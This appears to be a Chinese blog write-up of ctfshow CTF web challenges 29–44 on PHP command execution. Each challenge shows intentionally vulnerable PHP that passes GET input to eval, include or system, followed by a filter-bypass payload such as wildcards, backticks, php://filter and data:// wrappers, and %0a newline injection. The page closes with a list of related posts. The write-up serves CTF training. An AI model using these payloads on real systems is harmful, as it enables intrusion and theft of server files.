ctfshow-web命令执行(web29-44)

最新推荐文章于 2024-07-27 11:08:17 发布
最新推荐文章于 2024-07-27 11:08:17 发布
阅读量592 收藏 1
点赞数
分类专栏: 网络安全学习(web) 文章标签: 链表 算法 单链表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50268414/article/details/121609598
版权

ctfshow-web命令执行(web29-44)(Completed)

借着刷题的机会正好系统深入地了解以下世界上最好的语言–拍黄片~ 哦不,PHP~

文章目录





web29 ?绕过 cp命令

题目描述

命令执行,需要严格的过滤

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

看到了preg_match函数,打开[preg_match]学习一手(https://www.php.net/manual/zh/function.preg-match.php “preg_match”)

了解到了

模式分隔符后的"i"标记这是一个大小写不敏感的搜索

也就是该行代码会过滤flag字符串,对大小写不敏感,就是说对于输入进来的不管大小写都会被过滤,所以也没啥思路,就先看以下phpinfo界面,注意要加分号,没有可利用的地方,再用system(“ls”)康康,看到了俩文件

flag.php index.php

因为过滤了flag字符,我们用cp命令把flag提取出来然后访问嘿嘿

payload:url/?c=system(‘cp fla?.php 2.txt’)

然后访问2.txt

image




web30 ``也可以当命令执行哦

题目描述

命令执行,需要严格的过滤

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了’flag’ -> 用fla?
过滤了system -> 用’‘直接提交 (在php里’'相当于system)
过滤了php ->用???
i -> 大小写都给你截了
因此,上传c=`cp fla?.??? 1.txt`;(注意`这个符号)
ps:别忘了分号,整个c相当于一个执行语句
然后访问/1.txt即可获得flag




web31 GET字符逃逸

题目

命令执行,需要严格的过滤

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了这么多东西?
那就骚操作:url/?c=eval($_GET[a]);&a=system('ls');
这样就可以绕过对c的限制随意执行命令了
payload -> url/?c=eval($_GET[a]);&a=system('cat flag.php');

ps:这时拿到的代码是在源代码里的,没有回显,这时把cat改成tac即可直接回显flag




web32 include

题目

命令执行,需要严格的过滤

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
} 
?>


?> = ;
但因为没有分号,所以会导致后面无法输出flag,因此使用文件包含
%0a = 换行

payload -> url/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

拿到flag后base64解码即出flag




web33 require

题目

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
} 


这次多过滤了一个双引号
前面的方法应该都可用,但这次用一个新方法:require

payload->url/?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
即得flag




web34 仍然include

题目

命令执行,需要严格的过滤

<php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
?>

看到源代码过滤了括号,不用括号的语言结构:
echo print isset unset include require

print要使用必须要eval加上括号才可以使用
所以还是使用include

payload -> url/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php




web35 还是include

题目

命令执行,需要严格的过滤

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
?>

限制了个寂寞

payload -> url/?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php




web36 还是一样

题目描述
与之前的题目一样,多限制了数字,直接使用上题payload
payload -> url/?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php




web37 data伪协议

题目描述

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
} 
?>

了解到data协议后面的代码可以被当成php代码执行
构造payload->url/?c=data://text/plain,<?php phpinfo();?>
发现可以执行
所以本题payload -> url/?c=data://text/plain,<?php system("tac fla?.php");?>




web38 =代替php

题目描述

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }    
}else{
    highlight_file(__FILE__);
} 
?>

比上一题多过滤了php,了解到
<?php 等于 <?=
于是
payload->url/?c=data://text/plain,<?= system("tac fla?.???")?>




web39 php后缀

题目描述

data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用

 <?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

上传后会添加php后缀
没有影响,payload和上题一样




web40 show_source

题目描述

show_source(next(array_reverse(scandir(pos(localeconv()))))); GXYCTF的禁止套娃 通过cookie获得参数进行命令执行

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}


源代码过滤了一堆东西,我们直接看提示

扫目录获得源码
show_source(next(array_reverse(scandir(pos(localeconv())))));




web41 只留下了|

大佬的wp:writeup
运行脚本即可得答案


web42 cat查看源代码

题目描述

 <?php

if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
} 
?>

代码得system行代表了将c返回的值输入到黑洞里,即不显示

方法一 %0a绕过

payload->url/?c=cat flag.php%0a
原理:%0a相当于命令执行中的回车

方法二 双写绕过

读取变量c的时候是从右往左读,因此在双写时只会将后一个命令吸入黑洞,前面的不受影响
payload->url/?c=tac flag.php;ls




web43 nl查看源代码

题目描述

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

hint:nl flag.php%0a 查看源代码

方法一 nl查看源代码

payload->url/?c=nl flag.php%0a

方法二 tac

payload->url/?c=tac flag.php%0a




web44 nl查看源代码2

题目描述

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上题基本一样,多过滤了flag

payload->url/?c=tac fla?.php%0a




nostrawberry
关注
专栏目录
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 300
ctfshow,命令执行,web30
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 925
ctfshow,命令执行web31
ctfshow-web44(命令执行)
m0_62094846的博客
01-26 116
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:32:01 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c'];..
ctfshow web入门命令执行44-48
m0_62207170的博客
03-29 348
ctfshow web入门命令执行44-48
Java漏洞复现(ctfshow279-297)strust 漏洞复现及原理解释
最新发布
m0_74402888的博客
07-27 826
而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行OGNL表达式,同时这个 getText() 的 参数输入点,又可以被用户直接进行控制,如果这个点被恶意攻击者所控制,就可以构造恶意执行代码,从而实现一个RCE攻击。<s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。
ctfshow- java
qq_45951598的博客
08-25 577
web279-294 296-297 yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47
CTF-命令执行
Luodehahajiang的博客
07-03 2107
ctf 命令执行 命令执行函数 命令执行绕过方法
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
qq_53058639的博客
11-01 141
执行就可以造成命令执行先用get方式传入一个。
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFshow--web入门--命令执行29--55)
weixin_53425135的博客
11-23 2546
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
ctfshow-命令执行-web37
weixin_43400535的博客
11-03 2893
ctfshow-web37 文章目录ctfshow-web37题目描述:原理:审计:方法:思路:利用文件按包含漏洞,data协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:18:55 # @email: h1xa
CTF下的命令执行
Lemon's blog
04-28 9764
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
ctfshow——54命令执行需要严格过滤
manerzi的博客
11-02 984
ctfshow——54命令执行需要严格过滤
CTFshow——命令执行
lee_maple的博客
04-23 5632
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
Ctfer训练计划】——(八)
热门推荐
Demo不是emo的博客
12-31 1万+
ctfer每日训练中
flag in flag.php,hgame2019解题记录
weixin_42531128的博客
03-17 1006
“想与你赏流河山川,踏青山风光无限,樵采打渔为生,尽是梦里的人间。”菜鸡来写wp啦…Level - Week 1WEB谁吃了我的flagfirst根据题目描述,vim、未正常关机…估计也就是考察vimbak的知识,意外退出时,并不会覆盖旧的交换文件,而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改,文件内容还是和打开时一样。第一次产生的交换文件名为“.file.txt.swp”;再次意...
flag就在flag.php,flag就在flag.php中
weixin_35355431的博客
03-11 2398
Web1题目地址1.访问题目存在一个登录界面2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示3.访问flag.php,试试可不可以得到flag提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的在登录成功跳转的那个页面还有一个修改密码的...
ctf.show web入门(命令执行29~56
qq_61768489的博客
01-27 3106
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match()函数学习一下: preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0 在这个正则里边有一个参数是i,这个在正则
CTFshow 命令执行 web38
Kradress的博客
10-30 174
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nostrawberry

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值